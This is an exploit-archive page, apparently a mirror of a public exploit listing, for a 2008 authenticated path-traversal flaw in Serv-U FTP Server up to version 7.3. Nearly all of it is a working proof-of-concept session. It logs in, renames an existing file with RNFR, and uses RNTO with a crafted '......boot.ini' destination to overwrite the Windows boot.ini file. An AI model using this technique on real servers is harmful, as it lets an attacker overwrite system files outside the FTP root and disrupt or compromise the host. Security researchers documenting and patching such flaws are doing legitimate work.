Serv-U <= 7.3 Remote FTP File Replacement Vulnerability (auth)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Serv-U <= 7.3 Remote FTP File Replacement Vulnerability (auth)
# Published : 2008-10-03
# Author : dmnt
# Previous Title : mIRC 6.34 Remote Buffer Overflow Exploit
# Next Title : MS Windows GDI (EMR_COLORMATCHTOTARGETW) Exploit MS08-021

#Serv-U <= 7.2.0.1 / 7.3 ftp file replacement
#user must have upload permissions
#
#(x) dmnt 2008-10-01
220 Serv-U FTP Server v7.3 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
rnfr any_exist_file.ext
350 File or directory exists, ready for destination name.
rnto ......boot.ini
250 RNTO command successful.
#boot.ini rewrited

# www.Syue.com [2008-10-03]